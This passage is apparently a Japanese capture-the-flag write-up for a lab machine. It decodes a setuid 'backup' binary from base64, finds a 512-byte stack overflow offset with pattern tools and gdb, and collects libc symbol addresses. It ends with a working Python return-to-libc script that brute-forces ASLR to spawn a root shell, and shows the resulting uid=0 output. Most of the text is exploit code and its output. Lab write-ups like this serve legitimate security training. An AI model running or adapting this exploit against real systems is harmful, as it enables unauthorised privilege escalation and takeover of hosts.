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
ZXJlZ2lzdGVyX3RtX2Nsb25lcwBfX2RvX2dsb2JhbF9kdG9yc19hdXgAY29tcGxldGVkLjcyMDAA
X19kb19nbG9iYWxfZHRvcnNfYXV4X2ZpbmlfYXJyYXlfZW50cnkAZnJhbWVfZHVtbXkAX19mcmFt
ZV9kdW1teV9pbml0X2FycmF5X2VudHJ5AGJhY2t1cC5jAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5E
X18AX19pbml0X2FycmF5X2VuZABfRFlOQU1JQwBfX2luaXRfYXJyYXlfc3RhcnQAX19HTlVfRUhf
RlJBTUVfSERSAF9HTE9CQUxfT0ZGU0VUX1RBQkxFXwBfX2xpYmNfY3N1X2ZpbmkAc3Ryc3RyQEBH
TElCQ18yLjAAc3RyY21wQEBHTElCQ18yLjAAX0lUTV9kZXJlZ2lzdGVyVE1DbG9uZVRhYmxlAF9f
eDg2LmdldF9wY190aHVuay5ieABzdHJjc3BuQEBHTElCQ18yLjAAZmdldHNAQEdMSUJDXzIuMABf
ZWRhdGEAZmNsb3NlQEBHTElCQ18yLjEAdGltZUBAR0xJQkNfMi4wAGdldGV1aWRAQEdMSUJDXzIu
MABtaXgAc3RyY2F0QEBHTElCQ18yLjAAc3RyY3B5QEBHTElCQ18yLjAAZ2V0cGlkQEBHTElCQ18y
LjAAX19kYXRhX3N0YXJ0AHB1dHNAQEdMSUJDXzIuMABzeXN0ZW1AQEdMSUJDXzIuMABjbG9ja0BA
R0xJQkNfMi4wAF9fZ21vbl9zdGFydF9fAGV4aXRAQEdMSUJDXzIuMABfX2Rzb19oYW5kbGUAZGlz
cGxheVN1Y2Nlc3MAX0lPX3N0ZGluX3VzZWQAc3JhbmRAQEdMSUJDXzIuMABzdHJjaHJAQEdMSUJD
XzIuMABfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGRpc3BsYXlXYXJuaW5nAGRpc3BsYXlU
YXJnZXQAX19saWJjX2NzdV9pbml0AGZvcGVuQEBHTElCQ18yLjEAc3RybmNweUBAR0xJQkNfMi4w
AF9mcF9odwBhY2Nlc3NAQEdMSUJDXzIuMABfX2Jzc19zdGFydABtYWluAHNldHVpZEBAR0xJQkNf
Mi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAc3ByaW50ZkBAR0xJQkNfMi4wAHJlbW92ZUBAR0xJQkNf
Mi4wAF9fVE1DX0VORF9fAF9JVE1fcmVnaXN0ZXJUTUNsb25lVGFibGUAAC5zeW10YWIALnN0cnRh
YgAuc2hzdHJ0YWIALmludGVycAAubm90ZS5BQkktdGFnAC5ub3RlLmdudS5idWlsZC1pZAAuZ251
Lmhhc2gALmR5bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5
bgAucmVsLnBsdAAuaW5pdAAucGx0LmdvdAAudGV4dAAuZmluaQAucm9kYXRhAC5laF9mcmFtZV9o
ZHIALmVoX2ZyYW1lAC5pbml0X2FycmF5AC5maW5pX2FycmF5AC5qY3IALmR5bmFtaWMALmdvdC5w
bHQALmRhdGEALmJzcwAuY29tbWVudAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAbAAAAAQAAAAIAAABUgQQIVAEAABMAAAAAAAAAAAAAAAEAAAAAAAAAIwAAAAcAAAAC
AAAAaIEECGgBAAAgAAAAAAAAAAAAAAAEAAAAAAAAADEAAAAHAAAAAgAAAIiBBAiIAQAAJAAAAAAA
AAAAAAAABAAAAAAAAABEAAAA9v//bwIAAACsgQQIrAEAACAAAAAFAAAAAAAAAAQAAAAEAAAATgAA
AAsAAAACAAAAzIEECMwBAADAAQAABgAAAAEAAAAEAAAAEAAAAFYAAAADAAAAAgAAAIyDBAiMAwAA
4wAAAAAAAAAAAAAAAQAAAAAAAABeAAAA////bwIAAABwhAQIcAQAADgAAAAFAAAAAAAAAAIAAAAC
AAAAawAAAP7//28CAAAAqIQECKgEAAAwAAAABgAAAAEAAAAEAAAAAAAAAHoAAAAJAAAAAgAAANiE
BAjYBAAACAAAAAUAAAAAAAAABAAAAAgAAACDAAAACQAAAEIAAADghAQI4AQAAMgAAAAFAAAAGAAA
AAQAAAAIAAAAjAAAAAEAAAAGAAAAqIUECKgFAAAjAAAAAAAAAAAAAAAEAAAAAAAAAIcAAAABAAAA
BgAAANCFBAjQBQAAoAEAAAAAAAAAAAAAEAAAAAQAAACSAAAAAQAAAAYAAABwhwQIcAcAAAgAAAAA
AAAAAAAAAAgAAAAAAAAAmwAAAAEAAAAGAAAAgIcECIAHAACiCwAAAAAAAAAAAAAQAAAAAAAAAKEA
AAABAAAABgAAACSTBAgkEwAAFAAAAAAAAAAAAAAABAAAAAAAAACnAAAAAQAAAAIAAAA4kwQIOBMA
ABQMAAAAAAAAAAAAAAQAAAAAAAAArwAAAAEAAAACAAAATJ8ECEwfAABMAAAAAAAAAAAAAAAEAAAA
AAAAAL0AAAABAAAAAgAAAJifBAiYHwAAZAEAAAAAAAAAAAAABAAAAAAAAADHAAAADgAAAAMAAAAI
vwQICC8AAAQAAAAAAAAAAAAAAAQAAAAAAAAA0wAAAA8AAAADAAAADL8ECAwvAAAEAAAAAAAAAAAA
AAAEAAAAAAAAAN8AAAABAAAAAwAAABC/BAgQLwAABAAAAAAAAAAAAAAABAAAAAAAAADkAAAABgAA
AAMAAAAUvwQIFC8AAOgAAAAGAAAAAAAAAAQAAAAIAAAAlgAAAAEAAAADAAAA/L8ECPwvAAAEAAAA
AAAAAAAAAAAEAAAABAAAAO0AAAABAAAAAwAAAADABAgAMAAAcAAAAAAAAAAAAAAABAAAAAQAAAD2
AAAAAQAAAAMAAABwwAQIcDAAAAgAAAAAAAAAAAAAAAQAAAAAAAAA/AAAAAgAAAADAAAAeMAECHgw
AAAEAAAAAAAAAAAAAAABAAAAAAAAAAEBAAABAAAAMAAAAAAAAAB4MAAANAAAAAAAAAAAAAAAAQAA
AAEAAAARAAAAAwAAAAAAAAAAAAAAgDoAAAoBAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAIAAAAAAAAA
AAAAAKwwAAAABgAAHgAAAC8AAAAEAAAAEAAAAAkAAAADAAAAAAAAAAAAAACsNgAA1AMAAAAAAAAA
AAAAAQAAAAAAAAA=
エンコード結果を攻撃端末のbackup_base64ファイルに張り付けて下記を実行
# base64デコード
$ cat backup_base64 | base64 -d > backup
# 実行権限付与
$ chmod +x backup
# 確認
$ file backup
backup: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
実行時/etc/myplace/keysがないとエラーになるので作成
$ cat > ./keys << 'EOF'
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
EOF
$ sudo mkdir /etc/myplace/
$ sudo mv ./keys /etc/myplace/keys
checksecの実行
canaryは設定されていませんが、NX enabledなのでスタック上のコードは実行できません。その為、Return-to-libc攻撃を検討します。
$ checksec --file=./backup
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 96 Symbols No 0 6 ./backup
セグメンテーションフォールトが発生時のEIPレジスタの値からオフセットを算出します。
msf-pattern_createで文字列を生成
(特殊文字が入らないように含まれる文字を指定します)
$ msf-pattern_create -l 1000 -s ABCDEFGHIJKLMNOPQRSTUVWXYZ,abcdefghijklmnopqrstuvwxyz,0123456789
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
第3引数に与え、gdb-pedaで実行します。
$ gdb -q ./backup
gdb-peda$ r a '3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110' 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
<SNIP>
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x40b
EBX: 0xffffc190 --> 0x4
ECX: 0x0
EDX: 0x0
ESI: 0x80492c0 (<__libc_csu_init>: push ebp)
EDI: 0xffffc0df --> 0x796500 ('')
EBP: 0x72413971 ('q9Ar')
ESP: 0xffffb0b0 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...)
EIP: 0x31724130 ('0Ar1')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x31724130
[------------------------------------stack-------------------------------------]
0000| 0xffffb0b0 ("Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax"...)
0004| 0xffffb0b4 ("r3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9"...)
0008| 0xffffb0b8 ("4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0A"...)
0012| 0xffffb0bc ("Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay"...)
0016| 0xffffb0c0 ("r7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3"...)
0020| 0xffffb0c4 ("8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4A"...)
0024| 0xffffb0c8 ("As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay"...)
0028| 0xffffb0cc ("s1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x31724130 in ?? ()
セグメンテーションフォールト発生時のEIPレジスタの値 0x31724130 ('0Ar1') を msf-pattern_offset で調べることで、オフセットが 512 であることが特定できます。
$ msf-pattern_offset -l 1000 -s ABCDEFGHIJKLMNOPQRSTUVWXYZ,abcdefghijklmnopqrstuvwxyz,0123456789 -q 0Ar1
[*] Exact match at offset 512
エクスプロイト
libcのアドレス確認
ASLRが有効なので毎回動的にアドレスが変化します。
tom@node:~$ for i in {1..20}; do ldd /usr/local/bin/backup | grep "libc"; done
libc.so.6 => /lib32/libc.so.6 (0xf7609000)
libc.so.6 => /lib32/libc.so.6 (0xf760e000)
libc.so.6 => /lib32/libc.so.6 (0xf760a000)
libc.so.6 => /lib32/libc.so.6 (0xf753a000)
libc.so.6 => /lib32/libc.so.6 (0xf7556000)
libc.so.6 => /lib32/libc.so.6 (0xf75a2000)
libc.so.6 => /lib32/libc.so.6 (0xf7523000)
libc.so.6 => /lib32/libc.so.6 (0xf7521000)
libc.so.6 => /lib32/libc.so.6 (0xf756a000)
libc.so.6 => /lib32/libc.so.6 (0xf75d9000)
libc.so.6 => /lib32/libc.so.6 (0xf7520000)
libc.so.6 => /lib32/libc.so.6 (0xf7606000)
libc.so.6 => /lib32/libc.so.6 (0xf7560000)
libc.so.6 => /lib32/libc.so.6 (0xf75c2000)
libc.so.6 => /lib32/libc.so.6 (0xf75af000)
libc.so.6 => /lib32/libc.so.6 (0xf7570000)
libc.so.6 => /lib32/libc.so.6 (0xf75f8000)
libc.so.6 => /lib32/libc.so.6 (0xf75b1000)
libc.so.6 => /lib32/libc.so.6 (0xf761a000)
libc.so.6 => /lib32/libc.so.6 (0xf75b3000)
すべてのアドレスは0xf7で始まり、0x000で終わります。
変化するのは真ん中の3桁だけなので0xf75c2000を選び、アドレスが重複するまで何度も実行します。
# exitのアドレス
tom@node:~$ readelf -s /lib32/libc.so.6 | grep ' exit@@'
141: 0002e7b0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
# systemのアドレス
tom@node:~$ readelf -s /lib32/libc.so.6 | grep ' system@@'
1457: 0003a940 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0
# /bin/bashのアドレス
tom@node:~$ strings -a -t x /lib32/libc.so.6 | grep '/bin/sh'
15900b /bin/sh
権限昇格を行うpythonコード
#!/usr/bin/env python3
import struct
import subprocess
libc_base = 0xf7520000
system = struct.pack("<I", libc_base + 0x0003a940)
exit = struct.pack("<I", libc_base + 0x0002e7b0)
binsh = struct.pack("<I", libc_base + 0x15900b)
path = b"A" * 512 + system + exit + binsh
attempts = 1
for i in range(1, 5000):
attempts += 1
print("Attempts: " + str(attempts))
subprocess.run(['/usr/local/bin/backup', 'a', '3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110', path])
ターゲットサーバーで実行
tom@node:/tmp$ python3 root.py
rootシェルの獲得
# id
uid=0(root) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)